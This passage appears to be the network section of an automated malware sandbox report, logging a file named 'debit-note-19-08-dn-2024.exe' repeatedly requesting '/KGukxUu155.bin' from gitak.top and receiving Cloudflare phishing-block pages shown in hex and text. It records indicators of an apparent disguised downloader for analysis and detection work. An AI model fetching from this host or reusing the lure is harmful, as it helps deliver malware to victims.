                              2024-08-26 13:37:19 UTC1369INData Raw: 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 53 49 52 58 72 72 46 54 6a 72 6a 67 61 6a 70 31 45 63 48 57 4a 6d 2e 30 46 55 78 6c 35 4c 50 66 34 5a 6e 4f 43 66 66 64 5a 76 38 2d 31 37 32 34 36 37 39 34 33 38 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74
                              Data Ascii: <input type="hidden" name="atok" value="SIRXrrFTjrjgajp1EcHWJm.0FUxl5LPf4ZnOCffdZv8-1724679438-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-bt
                              2024-08-26 13:37:19 UTC856INData Raw: 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66
                              Data Ascii: rator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudf
                              2024-08-26 13:37:19 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              30192.168.11.2049847172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:37:29 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:37:29 UTC535INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:37:29 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ysZmsCePjV4KrKTEKgdrGpMORH5mlE47%2FAs6Mig8BuQa6dzJ9UWldTkAW1uUAyS09n1fuSlLwuXwFAxpiexacaj5NLqzfUwaabaXx173FxYQ6uVX4NnRsm9mKjU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94377f5c303b02-IAD
                              2024-08-26 13:37:29 UTC834INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:37:29 UTC1369INData Raw: 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 20 20
                              Data Ascii: " /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:37:29 UTC1369INData Raw: 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 43 4e 46 39 67 41 5f 48 74 4b 67 67 44 68 36 46 4b 68 6d 55 55 76 41 63 33 53 46 58 31 6b 37 59 2e 45 35 35 74 67 34 74 65 46 55 2d 31 37 32 34 36 37 39 34 34 39 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22
                              Data Ascii: ut type="hidden" name="atok" value="CNF9gA_HtKggDh6FKhmUUvAc3SFX1k7Y.E55tg4teFU-1724679449-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="
                              2024-08-26 13:37:29 UTC846INData Raw: 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f
                              Data Ascii: idden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></
                              2024-08-26 13:37:29 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              31192.168.11.2049848172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:37:39 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:37:40 UTC547INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:37:40 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Az9iGbnvEk0fmr04Jq0rwJk7bIIui9MbFxJSi%2F15HlwsQ2upfkQOS%2BmO%2BtaB02BnlctL2OwDs1UcMH4lxcBccqIbmXnm4gPU%2F6edh%2B%2FV%2FjBd5fEdMIFoDV4njcY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9437c12a109c2e-IAD
                              2024-08-26 13:37:40 UTC822INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:37:40 UTC1369INData Raw: 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61
                              Data Ascii: rrors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-a
                              2024-08-26 13:37:40 UTC1369INData Raw: 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 46 6f 4b 4c 72 5f 64 47 75 4c 71 30 64 48 47 54 43 31 47 70 45 46 56 36 37 4b 35 6d 6c 30 44 6c 4e 5f 36 53 77 42 63 36 5f 48 49 2d 31 37 32 34 36 37 39 34 36 30 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d
                              Data Ascii: <input type="hidden" name="atok" value="FoKLr_dGuLq0dHGTC1GpEFV67K5ml0DlN_6SwBc6_HI-1724679460-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-
                              2024-08-26 13:37:40 UTC858INData Raw: 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75
                              Data Ascii: parator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Clou
                              2024-08-26 13:37:40 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              32192.168.11.2049849172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:37:50 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:37:50 UTC543INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:37:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wJ7F8TAzPtGU62nzlY%2F9XR98dc5A2e4%2FYB%2Bz9vYj%2Bju48cTMy%2FLUbfsYDMjTloOXnWyBrdMCLgDk5IRpTZj0zJ1mxwtJIy9JEDOnmfmAMpU2o3XJfyyKpm8UgOc%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9438030c3907cf-IAD
                              2024-08-26 13:37:50 UTC826INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:37:50 UTC1369INData Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74
                              Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
                              2024-08-26 13:37:50 UTC1369INData Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 46 5a 4b 38 70 31 69 72 58 72 62 79 55 79 5a 63 4c 55 35 6e 4a 4e 65 6e 4e 79 31 31 64 45 33 4c 49 4b 6d 61 57 70 7a 4f 78 35 34 2d 31 37 32 34 36 37 39 34 37 30 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22
                              Data Ascii: <input type="hidden" name="atok" value="FZK8p1irXrbyUyZcLU5nJNenNy11dE3LIKmaWpzOx54-1724679470-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
                              2024-08-26 13:37:50 UTC854INData Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61
                              Data Ascii: tor sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
                              2024-08-26 13:37:50 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              33192.168.11.2049850172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:38:00 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:38:01 UTC539INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:38:01 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nJdM0dEpn2wivOm%2B695MCi0dnqWf5PpdTT2ZZTymzHMGVEsGAm4lEox%2BiRSaLk0pwkwxcTgC9DwdgI5Kz8MfFQsEjR6aLCf55wNf1q%2Fmifa4gLZOs01s2DNRsBY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94384499e907b5-IAD
                              2024-08-26 13:38:01 UTC830INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:38:01 UTC1369INData Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a
                              Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
